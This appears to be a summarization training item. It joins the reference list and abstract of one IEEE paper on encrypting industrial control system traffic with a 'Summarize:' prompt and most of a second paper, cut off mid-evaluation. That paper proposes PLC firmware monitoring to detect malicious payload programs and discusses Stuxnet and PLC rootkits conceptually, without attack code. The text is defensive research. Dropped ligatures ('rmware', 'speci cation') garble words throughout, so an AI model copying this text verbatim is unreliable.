2015.[8] IEC 62351 (2016-09): Power systems management and associated in- formation exchange - Data and communications security . International Electrotechnical Commission, 2016. [9] David Bailey and Edwin Wright. Practical SCADA for industry . Newnes, 2003. [10] Stewart Baker, Shaun Waterman, and George Ivanov. In The Cross re. Technical report, McAfee, 2010. [11] Manuel Cheminod, Luca Durante, and Adriano V alenzano. Review of security issues in industrial networks. IEEE Transactions on Industrial Informatics , 9(1):277 293, 2013. [12] Tim Conway, Robert M. Lee, and Michael J. Assante. Analysis of the cyber attack on the Ukrainian power grid. Defense use case. Technical report, SANS ICS, 2016. [13] E. Costante, J.I. den Hartog, M Petkovi c, S. Etalle, and M. Pech- enizkiy. Hunting the unknown - white-box database leakage detection.InDBSEC, LNCS 8566 , pages 243 259, 2014. [14] Nicolas Falliere, Liam O Murchu, and Eric Chien. W32. stuxnet dossier. White paper , Symantec Corp., Security Response , 5(6), 2011. [15] FBI. Vulnerabilities in Tridium Niagara Framework Result in Unau- thorized Access to a New Jersey Company s ICS, 2012. [16] ICS-CERT. Advisory ICSA-10-090-01: Mariposa Botnet, 2010.[17] S. Kent. IP Authentication Header. RFC 4302, 2005. [18] S. Kent. IP Encapsulating Security Payload (ESP). RFC 4303, 2005. [19] S. Kent and K. Seo. Security Architecture for the Internet Protocol. RFC 4301, 2005. [20] HyungJun Kim. Security and vulnerability of SCADA systems over IP-based wireless sensor networks. International Journal of Distributed Sensor Networks , 2012. [21] Joel Langill. Defending Against the Dragon y Cyber Security Attacks. Technical report, Belden, 2014. [22] Joel Langill, Emmanuele Zambon, and Daniel Trivellato. Cyberes- pionage campaign hits energy companies. Technical report, Security Matters, 2014. [23] Ralph Langner. Stuxnet: Dissecting a cyberwarfare weapon. IEEE Security & Privacy , 9(3):49 51, 2011. [24] Ralph Langner. To Kill a Centrifuge. Technical report, Langner Group, 2013. [25] David McMillen. Security attacks on industrial control systems. Technical report, IBM, 2017. [26] Nell Nelson. The Impact of Dragon y Malware on Industrial Control Systems. Technical report, SANS ICS, 2016. [27] Adam Slagell. Thinking critically about computer security trade-offs. Skeptical Inquirer , 2016. [28] A. Sperotto, G. Schaffrath, R. Sadre, C. Morariu, A. Pras, and B. Stiller. An overview of ip ow-based intrusion detection. IEEE Communications Surveys and Tutorials , 12(3):343 356, 2010. [29] Keith Stouffer, Suzanne Lightman, Victoria Pillitteri, Marshall Abrams, and Adam Hahn. Guide to industrial control systems (ICS) security , volume 800. NIST, 2014. [30] V erizon RISK Team. Data breach digest, 2016. [31] V erizon RISK Team. Data breach digest, 2017. [32] Daniel Trivellato and Dennis Murphy. Lights out! Who s next? Technical report, Security Matters, 2016. [33] Y ongge Wang. sSCADA: securing SCADA infrastructure communi- cations. Int. J. Communication Networks and Distributed Systems , 6(1):59, 2011. [34] Wonderware Invensys Systems. Securing Industrial Control Systems , 1.4 edition, 2007. [35] Omer Y uksel, Jerry den Hartog, and Sandro Etalle. Towards useful anomaly detection for back of ce networks. In ICISS, LNCS 10063 , pages 509 520. Springer International Publishing, 2016. [36] Bonnie Zhu, Anthony Joseph, and Shankar Sastry. A taxonomy of cyber attacks on SCADA systems. In iThings/CPSCom , pages 380 388. IEEE, 2011. 6IEEE International Conference on Smart Grid Communications 23-26 October 2017 // Dresden, Germany 294Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:41:52 UTC from IEEE Xplore. Restrictions apply.
Summary:
Nowadays, the internal network communication of Industrial Control Systems (ICS) usually takes place in unencrypted form. This, however , seems to be bound to change in the future: as we write, encryption of network traf c isseriously being considered as a standard for future ICS. In this paper we take a critical look at the pro s and con s of traf c encryption in ICS. We come to the conclusion that encryptingthis kind of network traf c may actually result in a reduction of the security and overall safety. As such, sensible versus non- sensible use of encryption needs to be carefully considered both in developing ICS standards and systems.
|
Summarize:
I. I NTRODUCTION In industrial control systems (ICS), programmable logic controllers (PLC) play a critical role in process automation. As cyber attacks targeting ICS increase in sophistication, eld devices, such as PLCs, are of particular concerns because they directly monitor and control physical processes. As shown in Figure 1, PLCs are typically deployed close to sensors and actuators, implementing local control actions (i.e., regulatory control). In addition of utilizing sensor data and controlling actuators locally, PLCs transmit real-time process data to operator workstations and execute their commands, facilitating the realization of supervisory control. Due to the unique and vital role of PLCs in critical ICS infrastructure [1], they are one of the major targets of cyber attacks. For example, the Stuxnet attack managed to silently sabotage centrifuges in a uranium-enrichment plant by reading and writing code blocks on PLCs from a compromised engineering workstation [2], [3]. By modifying a PLC s control program, severe damages (e.g., data loss, interruption of system operation, and destruction of ICS equipment) can be induced by attackers. In [4], it is shown that malicious code can easily be slipped into PLC control programs and evade the scrutiny of relay engineers from both academia and industry. Therefore, it is crucial Engineering Workstation Operator Workstation (HMI) Physical InfrastructureSensor Actuator Sensor Actuator Sensor Actuator Sensor ActuatorPLC Control NetworkCorporate Workplace Corporate NetworkFig. 1. Architecture of industrial control systems and the role of PLCs. to devise automated detection method against cyber attacks launched by modi ed PLC s control program. As PLCs are special-purpose computers interfacing with various sensors/actuators and providing rmware support to run control programs (also known as payload programs [5], [6]) that emulate the behaviors of an electric ladder dia- gram [7], [1], attacks on PLCs can be launched by modifying or overwriting the PLC payload program. Such attacks are known as PLC payload attacks. A PLC control program is typically written by a team of PLC engineers using the suite of programming languages speci ed in IEC 61131-3 [8]. Such a control program is regarded as the payload of a PLC s rmware, which controls access to hardware resources (e.g., inputs, outputs, and timers) and repeatedly loops through the payload instructions. An attacker with PLC access (e.g., by gaining control of an engineering workstation running PLC development and monitoring software) can download malicious payload and gain full control over its sensors and actuators. In the Stuxnet attack, a component of Stuxnet is capable of launching payload attacks on PLCs by rst infecting an engineering workstation and then downloading malicious code blocks [3]. Payload attacks can also be carried out by an insider (e.g., a disgruntled employee) with the help of tools such as SABOT [5], which generates malicious payload based on adversary-provided speci cations. Since legitimate payload relies on PLC programming instructions implemented by the rmware to carry out control and monitoring tasks, a malicious payload program can execute any combination of these instructions to sabotage the physical process. In this paper, we introduce runtime behavior monitoring into PLC rmware to detect payload attacks and protect ICS from severe physical damages. Based on control system spec- i cation provided by control system engineers, we establish runtime behavior pro le of normal/legitimate payload program in terms of I/O access patterns, network access patterns, as2018 IEEE Conference on Communications and Network Security (CNS) 978-1-5386-4586-4/18/$31.00 2018 IEEE Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:41 UTC from IEEE Xplore. Restrictions apply. well as payload program timing characteristics. When a newly updated payload program is downloaded into a PLC (either by an attacker or by a trusted control system engineer), its runtime behavior data is collected by the PLC rmware. When abnormal behaviors are observed by the rmware, execution of the payload program is terminated so that abnormal control signals will not be sent to actuators. The contributions of our work are as follows: We introduce runtime behavior monitoring into PLC rmware to enable automated detection of PLC pay- load attacks. In contrast to existing detection methods based on linear temporal logic, our proposed approach can identify attacks that violate real-time requirements of an ICS and does not require the introduction of bump-in-the-wire apparatus between engineering workstation and PLCs. We present a proof-of-concept implementation of the rmware-level payload attack detection scheme on ARMR CortexR -M4F microcontrollers. Our evalu- ation results show that the proposed approach can de- tect a wide variety of payload attacks revealed by prior research [4] and reported cyber-security incidents. Furthermore, we evaluate the overhead of implement- ing the proposed detection method and nd that it is feasible to incorporate our scheme on microcontrollers used by existing PLCs to detect payload attacks. II. R ELATED WORK A. Programmable Logic Controller (PLC) and Payload Pro- gram Execution Model A programmable logic controller (PLC) is a special- purpose computer designed to replace relay panels and control a physical process [7]. Figure 2 presents the general hard- ware and software architecture of PLCs. There are several important characteristics that distinguish PLCs from personal computers [9]: PLCs are designed to operate in harsh industrial environments and are programmed in relay ladder logic or other PLC programming languages [8]. In addition, a PLC ex- ecutes a simple payload program in a sequential fashion. Once deployed in an ICS, a PLC continuously collects readings from sensors connected to its inputs, runs the PLC payload program, and generates outputs that control the physical process. As shown in Fig. 1, PLC control program can be developed on engineering workstations using programming software that supports ladder logic or other PLC programming languages and downloaded to target PLC for execution. Operator of an ICS may monitor and control the physical process via a human-machine interface (HMI), which communicates with PLCs to receive real-time process data and issue control commands. To control and monitor physical process, a PLC s rmware implements input and output image tables as well as a program scan cycle [7], [9]. A program scan cycle consists of input scan, program scan, output scan, and housekeeping phases, which are shown in Fig. 3. After system start-up, a PLC repeatedly walks through the four phases of the program scan cycle as follows: First, in the input scan phase, the PLC HardwareI/O Timer Counter CPU Memory CommunicationFirmware Input image table Output image table Driver libraryControl logicPLC payload/control programFig. 2. General PLC hardware and software architecture. PLC rmware samples the I/O pin values and writes them into the input image table. Then, in the program scan phase, instructions in the payload program are executed one by one using values stored in the input image table. Output values are generated during this phase and written into the output image table. Next, in the output scan phase, values in the output image table are transferred to the external output terminals, making control actions speci ed in the payload program take effect. Finally, in the housekeeping phase, internal checks on memory and system operation are performed. Additionally, communication requests originated from other hosts (e.g., the HMI) or generated by the payload program itself are also serviced before the next program scan cycle starts. B. PLC Ladder Logic Many widely-used PLC programming languages are stan- dardized in IEC 61131-3 [8] and ladder logic is the most commonly used one [9] since it is straightforward to control system engineers who prefer to de ne control actions in terms of relay contacts and coils. Instructions speci ed by ladder logic have their own symbolic representation. A PLC payload program written in ladder logic has one or more ladder- formatted schematic diagrams. Within each diagram, ladder logic instructions are organized into rungs. Each rung may contain multiple ladder logic instructions, which are evaluated from left to right. Instructions on the left of a rung test input conditions or outputs generated by other rungs, and instructions on the right generate rung outputs. Multiple input condition checks can be placed in tandem, and the input logic evaluates to true if and only if all input conditions are true. Parallel branches can be used on a rung to accommodate more than one input condition combinations. The rung logic is evaluated to true as long as one of the branches forms a true logic path. When multiple output branches are present on a rung, a true logic path controls multiple outputs. Fig. 4 shows a sample subroutine of a ladder logic program consisting of three rungs. The XIC instruction on the rst rung examines if an input is true. If so, the instruction evaluates to true. The OTE instruction energizes a speci ed output bit. Input condition of the rst rung rst checks if input bit I:0/4 or Program start-upInput scanProgram scan Output scanHouse- keeping Fig. 3. PLC payload program execution model.2018 IEEE Conference on Communications and Network Security (CNS) Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:41 UTC from IEEE Xplore. Restrictions apply. I:0/4 I:0/3I:0/0 O:2/1O:2/2 Jump To SubroutineJSRXIC OTE SBR File Number U:7 ENDFig. 4. A sample ladder logic program with three rungs. I:0/3 is true and then checks if I:0/0 bit is true. The output of this rung controls both output bits, i.e., O:2/1 and O:2/2. The second rung s input condition is always true, so the subroutine in le U:7 is executed. Note that the subroutine is essentially another ladder logic diagram. When the subroutine returns, the second rung completes and the third rung is evaluated, which signals the end of the payload program. Note that hierarchical addressing is used in ladder logic program to specify the data type, slot number, and bit position of PLC data and peripherals [9]. For example, I:0/4 is the fth bit of binary input slot 0 (with the rst bit being I:0/0). For analog I/Os, the hierarchical address is slightly different. For example, O:2.0 is an analog output on the output module installed on slot 2, and the output value is written to the rst (zero-indexed) word of its allocated memory. Ladder logic provides a wide range of instructions for PLC engineers to specify control actions. Bit instructions examine status of individual input/internal bit or control a single output bit. Word instructions, such as mathematical operations, data transfer, and logical operations, operate on data words or registers. Program control instructions, such as subroutine invocation and return, control the execution ow of the payload program. For control program of large and complex ICS, subroutines are frequently used to better organize the instructions and enhancement maintainability. In addition, communication instructions allow a PLC to commu- nicate with other hosts via a particular ICS network protocol. From the perspective of PLC control program development, a malicious payload is essentially a combination of legitimate PLC programming instructions causing disastrous impacts on an ICS. In this paper, we focus on detecting payload attacks implemented via ladder logic, but the proposed techniques are applicable to attacks written in other languages [8] as well because different PLC programming languages can be used to implement the same control system speci cations [9]. C. Firmware vs. Payload Attacks As revealed by Fig. 2, both the PLC rmware and its payload program can become the target of cyber attacks. An attacker can reverse-engineer and modify the rmware on a PLC to launch rmware attacks. In this case, even though a legitimate payload program is downloaded to the PLC, its execution will still be monitored and/or intercepted by the modi ed rmware. In [10], a rootkit is developed on the CODESYS PLC runtime to intercept I/O operations of the payload program. When the payload wants to read or write a certain I/O pin, interrupt handler installed by the attacker is called rst, within which the attacker can recon gure the I/O pins or modify values to be read/written. In [6], a more advanced rootkit is developed for an Allen Bradley Compact- Logix PLC rmware. In addition to intercepting PLC inputsand outputs at the rmware, it incorporates physical-process awareness and always presents modi ed sensor measurements, hoaxing ICS operator in front of the HMI to think that the system runs normally. Firmware attacks typically requires detailed knowledge on target PLC s hardware components and reverse-engineering of its rmware because PLCs are closed-source embedded devices [11]. An attacker needs to install the rootkit on PLCs either via the built-in remote rmware update mechanism or by loading it via JTAG interface [6]. For rmware update process protected by cryptographic means (e.g., certi cate in the X.509 standard), it is hard to install a modi ed version of the rmware on the PLC. Alternatively, an attacker can load modi ed PLC rmware via JTAG interface. However, such an approach will require physical access to the PLC and possibly disassembling it. PLC payload attacks, on the other hand, are much easier to launch. An insider with proper privileges can easily down- load (e.g., a disgruntled control system engineer) a malicious payload program. As shown in Fig. 1, such an insider may download a malicious payload program via the engineering workstation to one or multiple PLCs. Integrity checks on PLC payload program cannot effectively prevent such attackers from downloading malicious payload because warnings on payload program changes can always be overridden once proper privileges are acquired (e.g., a password allowing engineers to repeatedly download revised payload program for development and debugging purposes). Alternatively, sophis- ticated cyber attacks, such as Stuxnet [2], [3], may include payload attack as a component to induce physical damages on ICS. Partial knowledge on the physical process can be suf cient to create a malicious payload using automated tools such as SABOT [5]. In [4], a small-scale challenge shows that malicious code snippets are likely to evade the scrutiny of code reviewers. Therefore, it is necessary to develop auto- mated payload attack detection mechanisms to protect physical infrastructure from PLC payload attacks. D. Payload Attack Detection As payload attacks can easily be launched by insiders or from compromised engineering workstations, several tech- niques that detect payload attacks have been proposed. In [12], a bump-in-the-wire device, called PLC guard, is introduced to intercept the communication between an engineering work- station and a PLC, allowing engineers to review the code and compare it against previous versions. Features of the PLC guard include various levels of graphical abstraction and summarization, which makes it easier to detect malicious code snippets. In [13], an external runtime monitoring device (e.g., a computer or an Arduino microcontroller board) sits alongside the PLC, monitors its runtime behaviors (e.g., inputs, outputs, timers, counters), and veri es them against ICS speci cations converted from a trusted version of the PLC payload program and written in interval temporal logic. It is shown that func- tional properties of payload program can be veri ed against ICS speci cations, but the types of payload attacks that can be detected by this approach remain to be explored. In [14], [15], a trusted safety veri er is introduced as a bump-in-the-wire device that automatically analyzes payload2018 IEEE Conference on Communications and Network Security (CNS) Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:41 UTC from IEEE Xplore. Restrictions apply. program to be downloaded onto a PLC and veri es whether critical safety properties are met using linear temporal logic. However, linear temporal logic implicitly assumes that states of the systems are observed at the end of a set of time intervals. In the case of PLC payload program, snapshot of system states is taken at the end of each program scan cycle. As a result, real-time properties that does not span multiple program scan cycles cannot be checked by the trusted safety veri er. For example, a legitimate payload program is required to energize its output immediately when a certain input pin is energized. An attacker can inject malicious code and prolong the program scan cycle to cause real-time property violation while evading code analytics based on linear temporal logic. In [16], the timer on-delay (TON) ladder logic instruction is modeled using linear temporal logic. The TON instruction starts a timer when its input condition evaluates to true and energizes its output (i.e., the Done bit) when the timer reaches the preset value. It is shown in [16] that TON behavior can be approximated with the combination of liveness and fairness properties: Either TON instruction is not used or TON output bit will eventually be energized. However, linear temporal logic cannot verify whether the TON output bit is energized at the exact program scan cycle designated by control system engineers. Therefore, such an approximation does not capture critical real-time requirements of ICS. In this paper, we introduce runtime behavior modeling and monitoring of PLC payload in PLC rmware. Our proposed approach complements existing detection techniques and can detect violations of ICS real-time properties. In addition, our proposed approach does not require the introduction of any external apparatus that may introduce new vulnerabilities into ICS. E. Runtime Behavior Monitoring for Anomaly Detection The idea of detecting abnormal program behaviors by monitoring its execution at runtime has been applied to an rich array of computer systems. Runtime behavior monitoring techniques on operating systems such as Windows, Linux, and Android are reviewed in [17], [18]. However, these techniques cannot be directly applied to PLCs since PLCs are closed- source systems [11] running specialized rmware and payload programs. System calls utilized by existing techniques are not available in PLC systems. In [19], a runtime anomaly detector hardware design is proposed for embedded systems, which TABLE I. C ONTROL SYSTEM SPECIFICATIONS VS . LEGITIMATE PLC CONTROL LOGIC Control System Speci cation Legitimate Control System Logic Digital I/O pins, values & functionalityControl logic of binary inputs and outputs Analog I/O pins, value ranges, & functionalitySensor output and actuator input ranges, control logic of analog I/Os Legitimate sequences and timing relationships of I/O operationsControl logic of I/Os, possibly controlled by counters and timers Network data packet and timing relationshipsData from network for local control tasks or data required by remote hosts (e.g., HMI or other networked PLCs), and real-time requirements for these network events Network commands and timing relationshipsControl tasks mandated by operator workstation and their real-time requirementseliminates performance overheads incurred by software-based runtime monitoring methods. In [20], a timing-based PLC pro- gram anomaly detector is designed. An external data collector is deployed to collect program execution time measurements and detect unauthorized modi cations to the PLC system. In [21], runtime behaviors are monitored via dedicated hard- ware performance counters, which are not widely available in microcontrollers utilized by PLCs. To detect payload attacks in existing ICS, runtime behavior monitoring technique must utilize only the resources available on microcontrollers used in existing PLCs and does not require external apparatus (e.g., data collector proposed in [20]). III. S YSTEM OVERVIEW A. Adversary Model A malicious payload may be directly downloaded by an insider with PLC programming privilege. For instance, the insider can be a PLC programmer responsible for deploying tested PLC payload program. However, he/she downloads a different payload, which may be written anew or modi ed from the tested version. Since such an attacker has proper privilege to program PLCs, integrity checks on PLC payload program can be overridden and will not prevent malicious payload from being downloaded. For an external attacker, security aw of other ICS components may be exploited to gain access to an engineering workstation, which allows he/she to download malicious payload. For example, in the Stuxnet attack [2], many potential attack vectors, including the PLC programming environment, are exploited to eventually compromise a PLC-connected engineering workstation. We assume that the attacker is not capable of changing the PLC rmware, which requires either attacking the cryp- tographically protected rmware image or loading modi ed rmware directly via JTAG interface. Therefore, rmware- level detection mechanism proposed in this paper is not tampered by the attacker. The goal of a payload attack is not limited to blocking legitimate outputs, causing system inter- ruption, and destruction of system equipment. Sophisticated attacks such as the PLC blaster worm [22] which replicates itself to other PLCs can also be launched. However, such attacks download a payload program that are signi cantly different from the legitimate version in terms of program size and functionality, which can be identi ed by human operator monitoring the control system. In this paper, we consider stealthy payload attacks that are modi ed from legitimate payload programs. Such attacks preserve certain legitimate payload properties (e.g., always sending sensor readings re- quested by HMI) while carrying out malicious tasks. B. PLC Program Development Process and Control System Speci cations To develop PLC payload program for an ICS, the following process is typically adopted by PLC engineers: 1) Speci cation Formulation. Control tasks to be carried out by a PLC are identi ed and input/output signals required by these tasks are de ned. The logical sequence of operations for the PLC are speci ed,2018 IEEE Conference on Communications and Network Security (CNS) Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:41 UTC from IEEE Xplore. Restrictions apply. e.g., in the form of sequence table, ow chart, or relay schematic [9]. 2) PLC Program Development. At this step, PLC pro- gram is developed based on the formulated speci - cations. Although an engineering team usually has its own set of guidelines and best practices on pro- gram organization and documentation, the generated PLC payload always aims to accurately implement the speci cations. At this stage, an attacker (e.g., a disgruntled control system engineer) may collect legitimate payload program and modify it to generate malicious payload. 3) Testing. Before deploying the PLC program, PLC engineers need to test the program via simulation or under some test environment. Safety properties (e.g., a circuit breaker must trip if a fault is detected) can be provided by system operators and/or iden- ti ed during speci cation formulation. In addition, different combinations of input values are fed to the PLC to ensure that correct responses are taken under different system operation scenarios. Although the test cases may not be exhaustive (e.g., it is hard to implement all test cases when analog inputs are used), important system properties, such as safety and real-time requirements, should always be validated. 4) Maintenance. After an initial version of the PLC control program is deployed, the ICS may go through hardware upgrades and design improvements. Ac- cordingly, the speci cations should be updated and the PLC program should be revised. After necessary testing, the new payload is downloaded to the PLC. In this paper, we assume that control system speci cations, such as the number of I/Os, functionality of each I/O pin, and possible ranges of I/O values, are available. Such speci ca- tions are usually provided by the control system engineering team that develops the legitimate payload program. Table I summarizes the control system speci cations required by our detection mechanism and the corresponding legitimate control system actions. For instance, when designing the legitimate payload, a digital output pin may be used to control a circuit breaker to trip. The engineering team knows whether a 0 or a 1 corresponds to the trip signal, so it is straight- forward to generate control system speci cations describing the functionality of this output pin. To implement control operation sequences (e.g., tripping a circuit breaker and then re-closing it), timers and counters are generally used. When the legitimate payload program is created, timers and counter must be properly con gured to control the temporal behaviors of the payload program. These con gurations can then be converted into timing relationships among I/O and network events. C. Payload Attack Detection at PLC Firmware Using control system speci cations, runtime behavior model of legitimate PLC payload program is established and stored in the PLC rmware. The timing relationships between inputs and outputs, the number of network packets generated after different control actions, as well as timing relationships between I/O and network events, are modeled. By modifying the PLC rmware, runtime behaviors of the payload program ............ Digital input terminals Digital output terminalsAnalog input terminalsAnalog output terminalsI:0/0 HIGH LOWManual reset energized Manual reset de-energized O:2/8 HIGH LOWEnergize circuit breaker (CB) trip coil De-energize CB trip coilO:3.0 12~15VCharge actuator battery I:1.0 0~3VActuator battery needs to be charged 12~15VActuator battery level is normalNetwork Port Packet counts (sending) Packet counts (receiving)1, 3 1Fig. 5. PLC wiring diagram with sample control system speci cations for I/O and network events. Note that wiring of I/O terminals is simpli ed (digital ground terminal as well as terminal pairs for each analog I/O are not shown). (e.g., I/O and network access patterns) are time-stamped and compared against the established runtime behavior model. In addition, a backup version of the output image table is separately stored by the rmware at the beginning of each program scan cycle. If a certain abnormal runtime behavior is detected, the backup output image table is loaded to overwrite the output generated by the payload. As a result, any output related to the detected abnormal runtime behavior will not affect the physical system. For PLC payload sending/receiving network packets, network requests are also blocked when a runtime behavior anomaly is detected by the rmware. IV. S YSTEM DESIGN A. PLC Payload Runtime Behavior Model Given the control system speci cations, it is possible to create a runtime behavior model for legitimate PLC payload. Suppose that we need to create control system speci cations for the PLC shown in Fig. 5. In this gure, sample speci - cations for I/O terminals and the network port is provided. We note that timing relationships are not shown in Fig. 5. The information categorized in Table I allows us to create the runtime behavior model as follows: First, the number of (analog and digital) I/Os and their feasible values are determined. For instance, for digital input I:0/0 in Fig. 5, its legitimate values are 1 and 0 . For analog input I:1.0 (note that the notation for analog I/Os is different from that for digital I/Os as mentioned in Sec. II-B), the legitimate value ranges are 03V and 1215V . In the PLC rmware, such information can be stored as a table (see Fig. 6 for an example), with each row storing the legitimate values/ranges of a particular pin. We call this table the I/O event table. Next, the number of network packets received or sent by the legitimate payload is extracted from the speci cations. Since PLC payload program is designed to control physical process, network packets are typically associated to speci c I/O conditions. For instance, when an alarm signal is energized to sound a horn, the same alarm signal is usually transmitted via a network packet to the HMI at the same time. When a process data request from the HMI is received, the PLC generates process data response(s) to transmit the requested2018 IEEE Conference on Communications and Network Security (CNS) Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:41 UTC from IEEE Xplore. Restrictions apply. I/O Event Table I/O Event I:0/0 I:1.0 O:2/8 O:3.0... ... ... ...Legitimate Values/Ranges 1 (HIGH), 0 (LOW)... 0:3 (0~3V), 12:15 (12~15V) 1 (HIGH), 0 (LOW)... 12:15 (12~15V)... ... Network Event Table Network EventLegitimate Packet Counts receiving sending1 1, 3Timing Behavior Matrix Fig. 6. A sample runtime behavior model established based on control system speci cations in Fig.5. The model consists of two tables and a sparse matrix. data. In the PLC rmware, network event information can be stored as a table with two rows (see Fig. 6 for an example). The rst row lists the numbers of network packets that can be received, and the second row lists those that can be sent. We call this table the network event table. Using the I/O and network event tables, we are able to model the legitimate runtime behaviors of I/Os and network port(s) at any particular time instant. Then, timing relationships between inputs, outputs, and network accesses are established. To store these relationships, a sparse matrix is created in the PLC rmware (see Fig. 6 for an example). We call this sparse matrix the timing be- havior matrix. Both the rows and the columns of the matrix are indexed by legitimate I/O and network operations. For instance, the I:0/0:1 event in the matrix in Fig. 6 represents the I/O event where digital input pin I:0/0 is set to HIGH. Each column of the matrix represents a particular payload program action, whereas the rows with non-zero values represent its preconditions. For instance, the matrix in Fig. 6 indicates that there are four preconditions under which a network packet will be generated and sent by a legitimate PLC payload. Note that the non-zero value in the matrix represent the maximum time (in microseconds) within which a column event will occur. Once all information provided in the control system spec- i cations is converted into a runtime behavior model, three tables are stored into the PLC rmware (i.e., the I/O event table, the network event table, and the timing behavior matrix). These tables will only be updated if changes to the control system speci cations are made (e.g., additions of new sen- sors/actuators). When a PLC payload is downloaded to a PLC, the PLC rmware assumes that its runtime behaviors match the ones speci ed in the supplied control system speci cations. Any deviation from the encoded runtime behavior model will be regarded as an anomaly. B. Payload Attack Detection at PLC Firmware Our detection scheme introduces runtime behavior moni- toring into the PLC rmware and compares the runtime be- haviors of the currently deployed payload against the runtime behavior model established from control system speci cations. To implement the proposed detection scheme, the following modi cations to the PLC rmware are incorporated: 1) Logging Access to Input and Output Images: As intro- duced in Sec. II-A, input image is updated before each run ofthe payload program, and output image is updated after each run. In existing PLC rmware, I/O reads move values from the input/output image to a designated memory location. When an output pin is written, value stored in a memory location is moved to the output image table. To receive/send a packet, receive/transmit queue is either explicitly (via ladder logic in- struction) or implicitly (at the end of the housekeeping phase) queried. To monitor the I/O and network access patterns, we modify the implementation of PLC rmware to log the system time-stamp of these operations. This can be achieved by setting up the memory protection unit (MPU) to enter interrupt when the user program accesses the input/output images or the network queues. In existing PLC rmware, a separate system timer is typically supported. This timer provides the time- stamps for the I/O and network events to be monitored. If I/O images are accessed, the interrupt handler decodes the I/O pin address and log the time-stamp of the operation. Suppose that the same input pin is accessed multiple times during a single program scan cycle, only the time-stamp of the rst read operation is logged. For an output pin, both the rst read and the last write operations are time-stamped. For access to network queues, the number of packets received/sent is logged and time-stamped. Time-stamps of I/O and network operations are stored in a separate table (known as the runtime time- stamp table) in the PLC rmware. Each entry of the table corresponds to a particular I/O event (e.g., a legitimate I/O value is observed) or network event (e.g., a legitimate number of packets are sent). In our current implementation, the maximum number of time-stamps logged by the runtime time-stamp table is 10 for each I/O event. If more than 10 time-stamps are collected, newly generated time-stamps will be discarded. We log the time-stamp for the rst I/O read operation and last output operation within each program scan cycle because control system speci cations typically use the observation of an I/O value on the physical process as precondition. Take the output pin O:2/8 in Fig. 5 as an example. Even if the payload program operates on O:2/8 multiple times during a program scan cycle, it is the last value written into the output image that will actually take effect. For each legitimate network event, our current implementation logs a maximum of 20 time-stamps. Newly collected time-stamps will be discarded if there are already 20 time-stamps pending in the table. 2) Validating Runtime Behaviors: When time-stamping I/O and network events, any event that is not included in the I/O and network event tables is regarded as an abnormal runtime event. In addition, a separate sparse matrix (known as the runtime sparse matrix ) is created and maintained in the PLC rmware to keep track of the timing relationships at runtime. The sparse matrix is also updated in the MPU interrupt handler. Runtime behaviors speci ed in the timing behavior matrix are validated in the output scan phase before the values in the output image are transferred to external output terminals. If any of the preconditions speci ed by the runtime behavior model are met, the timing relationships are checked. If an event occurs but none of its preconditions are active, a runtime behavior anomaly is detected. Take the timing behavior matrix in Fig. 6 as an example. Suppose that during a program scan cycle, we observe two occurrences of the event2018 IEEE Conference on Communications and Network Security (CNS) Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:38:41 UTC from IEEE Xplore. Restrictions apply. Send:1 . For the rst time-stamp of Send:1 , we check the all the time-stamps for its preconditions. If any of the timing relationships is met, the corresponding entry in the runtime sparse matrix is cleared. In the runtime time-stamp table, the oldest time-stamp for the corresponding precondition event is removed. If a violation of the timing relationship is detected, a runtime behavior anomaly is found and the execution of the payload program should be terminated. Then, for the second time-stamp of Send:1 , previously cleared precondition elds are set if the corresponding entries in runtime time-stamp table have pending time-stamps. The timing relationships for Send:1 are then validated again. 3) Backing Up the Output Image: At the beginning of each program scan cycle (i.e., in the input scan phase), a backup version of the output image table is separately stored by the PLC rmware. Values in this backup image are simply the output of the preceding program scan cycle. If runtime behavior anomaly is detected at the current program scan cycle, the backup image is used to overwrite the output image generated by the payload program. In this way, output values corresponding to illegitimate payload program behaviors are blocked. 4) Canceling Network Send/Receive Requests: There are two scenarios where network send/receive requests gener- ated by ladder logic instructions are processed: Network send/receive requests generated by a payload program are always processed in the housekeeping phase. To block these packets, we modify the rmware so that all pending network requests are cleared in the output scan phase if runtime be- havior anomaly is detected. Alternatively, a subset of network- related ladder logic instructions can request the PLC rmware to service pending network tasks immediately. To prevent such network access, the implementation of MPU interrupt handler is further modi ed to check the preconditions of requested network operations. Suppose that a network-related ladder logic instruction is executed, after the network requests are generated (e.g., four packets will be retrieved from the receive queue), the rmware rst enters the MPU interrupt handler and checks the preconditions of the requested network event. If any of the preconditions is met yet the corresponding timing relationship is violated, the network requests will not be executed because a runtime behavior anomaly is detected. It should be noted that our proposed detection scheme can easily be customized to notify ICS operators of the detection 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 Number of analog outputs0510152025303540Maximum memory size (kB)unmodified firmware modified firmware Fig. 7. Maximum memory utilization of unmodi ed and modi ed PLC rmware running PLC payload programs with different numbers of utilized analog outputs.of PLC payload attacks. Suppose an on-site operator is to be noti ed, an extra output pin can be energized to set up an alarm during the output scan phase when runtime behaviors are examined. It is also possible to send out an alarm message to a remote HMI during this phase after the runtime behavior validation is done. V. E VALUATION We implement the proposed payload attack detection method on Texas Instruments TM4C12x ARMR CortexR - M4F core-based microcontrollers. Payload attacks are written in ladder logic, which are converted into machine code and loaded onto the PLC prototype. Hardware resources of the chosen microcontroller series are the currently active equiv- alents to the microcontrollers used by existing PLCs [6]. Memory protection unit (MPU) and system timer are avail- able to implement our proposed detection scheme. Runtime behavior data collected by the PLC rmware is read from a Universal Asynchronous Receiver/Transmitter (UART) mod- ule connected to a PC. We rst evaluate the overhead of implementing the proposed detection mechanism and then its detection performance. A. Memory Overhead Memory overhead of implementing the proposed detection method comes from both the rmware and payload levels. In the PLC rmware, runtime behavior model converted from control system speci cations needs to be stored. Extra tables and sparse matrix are required to time-stamp and keep track of the runtime behaviors of the currently deployed payload. The sizes of these matrices and tables will grow as the number of I/O and network events speci ed in the control system speci cations grows. In addition, interrupt handler for the MPU as well as initialization code for the system timer and MPU need to be added to the PLC rmware. In our prototype, these rmware modi cations translate to about 200 lines of assembly code (compared to the unmodi ed PLC rmware with about 6000 lines of assembly code). To evaluate whether the memory overhead of our pro- 